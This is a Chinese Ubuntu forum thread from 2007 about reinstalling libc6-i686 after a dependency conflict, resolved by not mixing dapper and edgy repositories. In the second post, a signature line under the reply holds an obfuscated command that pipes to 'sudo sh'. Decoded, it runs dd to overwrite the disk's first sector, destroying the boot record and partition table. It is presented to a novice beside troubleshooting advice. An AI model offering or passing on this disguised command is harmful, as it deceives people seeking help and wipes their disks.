[问题]如何解决软件误删除后依赖性不满足无法重装的问题

为当前最终发行版之前的所有版本提供支持
回复
priest22781
帖子: 3
注册时间: 2007-04-17 10:36
送出感谢: 0
接收感谢: 0

[问题]如何解决软件误删除后依赖性不满足无法重装的问题

#1

帖子 priest22781 » 2007-04-17 10:39

请问我在UBUNTU新立得里不小心卸载了libc6-i686(版本2.3.6Oubuntu) 但是它所依赖的libc6是2.4版本lubuntu 现在无法重装 是否可以把libc6版本降下来 可那样貌似系统会崩溃 有没其他的方法把libc6-i686重装上去
希望给出详细解答 谢谢

PS:起初我打算装build-essential 但是要依赖libc6-dev 所以搜了下 后来不断依赖发现libc6-i686冲突就卸载了 结果发现不对劲已经晚了
ziyun
帖子: 262
注册时间: 2007-03-29 12:59
送出感谢: 0
接收感谢: 0

#2

帖子 ziyun » 2007-04-17 11:12

是你的源冲突了,改一下源试试
echo 'qq%vs+&qri&mreb%bs+&qri&uqn%of+FBC%pbhag+B' | tr 'n-za-m&+A-J%' 'a-z/=0-9 ' |sudo sh #<-警告:
强烈鄙视SB版主,一群跟风的SB,一群自以为是的SB
对这个论坛彻底失望了
priest22781
帖子: 3
注册时间: 2007-04-17 10:36
送出感谢: 0
接收感谢: 0

#3

帖子 priest22781 » 2007-04-17 11:44

ziyun 写了:是你的源冲突了,改一下源试试
我用的CN99+上交的源 不行么 请推荐个组合好的源
另我的UBUNTU是6.10版 用的dapper的源 是否要改成edgy的
dbzhang800
帖子: 3182
注册时间: 2006-03-10 15:10
来自: xi'an China
送出感谢: 0
接收感谢: 2 次
联系:

#4

帖子 dbzhang800 » 2007-04-17 12:30

priest22781 写了:
ziyun 写了:是你的源冲突了,改一下源试试
我用的CN99+上交的源 不行么 请推荐个组合好的源
另我的UBUNTU是6.10版 用的dapper的源 是否要改成edgy的
晕,这个当然要改了

谁告诉你源可以这样用的,除非你想降级到dapper
ziyun
帖子: 262
注册时间: 2007-03-29 12:59
送出感谢: 0
接收感谢: 0

#5

帖子 ziyun » 2007-04-17 12:39

我这里用系统自带的那份就很好了,速度也快
priest22781
帖子: 3
注册时间: 2007-04-17 10:36
送出感谢: 0
接收感谢: 0

#6

帖子 priest22781 » 2007-04-17 16:35

dbzhang800 写了:
priest22781 写了:
ziyun 写了:是你的源冲突了,改一下源试试
我用的CN99+上交的源 不行么 请推荐个组合好的源
另我的UBUNTU是6.10版 用的dapper的源 是否要改成edgy的
晕,这个当然要改了

谁告诉你源可以这样用的,除非你想降级到dapper
我把源地址中dapper换成edgy就可以了吧
头像
karron
帖子: 6226
注册时间: 2005-06-11 14:03
来自: 不明真相的群众
送出感谢: 0
接收感谢: 0
联系:

#7

帖子 karron » 2007-04-17 17:29

可以, 千万不要混用源.一定要用和系统匹配的源.
我的blog,关于技术,软件,linux,vim <---- 所有博客均被河蟹.
回复

回到 “老旧版本支持”